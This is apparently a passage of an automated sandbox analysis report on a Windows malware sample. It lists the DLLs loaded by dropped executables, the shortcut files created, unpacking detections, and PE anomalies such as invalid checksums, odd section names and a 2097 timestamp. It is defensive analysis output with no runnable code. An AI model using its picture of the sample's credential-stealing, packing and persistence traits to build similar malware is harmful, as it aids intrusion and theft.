Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: vaultcli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wintypes.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wldp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: vaultcli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wintypes.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wldp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office Jump to behavior
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static file information: File size 2962432 > 1048576
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: Raw size of wvtamnbw is bigger than: 0x100000 < 0x2a1000

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 2.2.explorha.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 3.2.explorha.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Unpacked PE file: 14.2.amert.exe.360000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Unpacked PE file: 15.2.chrosha.exe.70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Unpacked PE file: 20.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 28.2.MPGPH131.exe.890000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 29.2.MPGPH131.exe.890000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Unpacked PE file: 36.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 45.2.RageMP131.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Unpacked PE file: 51.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Binary contains a suspicious time stamp
Source: build12[1].exe.50.dr Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: cred64[1].dll.50.dr Static PE information: real checksum: 0x0 should be: 0x14356f
Source: build12.exe0.50.dr Static PE information: real checksum: 0x0 should be: 0x1f60e
Source: cred64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: amert.exe.6.dr Static PE information: real checksum: 0x1d614a should be: 0x1d4933
Source: chrosha.exe.14.dr Static PE information: real checksum: 0x1d614a should be: 0x1d4933
Source: clip64.dll.50.dr Static PE information: real checksum: 0x0 should be: 0x2272f
Source: explorha.exe.0.dr Static PE information: real checksum: 0x2d5a1e should be: 0x2d41c5
Source: clip64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: build12.exe.50.dr Static PE information: real checksum: 0x0 should be: 0x1f60e
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: real checksum: 0x2d5a1e should be: 0x2d41c5
Source: amert[1].exe.6.dr Static PE information: real checksum: 0x1d614a should be: 0x1d4933
Source: clip64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: build12[1].exe.50.dr Static PE information: real checksum: 0x0 should be: 0x1f60e
Source: clip64[1].dll.50.dr Static PE information: real checksum: 0x0 should be: 0x2272f
Source: cred64.dll.50.dr Static PE information: real checksum: 0x0 should be: 0x14356f
Source: cred64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: .idata
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: wvtamnbw
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: jjaorssu
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: .taggant
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name: wvtamnbw
Source: explorha.exe.0.dr Static PE information: section name: jjaorssu
Source: explorha.exe.0.dr Static PE information: section name: .taggant
Source: cred64[1].dll.6.dr Static PE information: section name: _RDATA
Source: cred64.dll.6.dr Static PE information: section name: _RDATA
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: fbupybke
Source: amert[1].exe.6.dr Static PE information: section name: ejxqaids
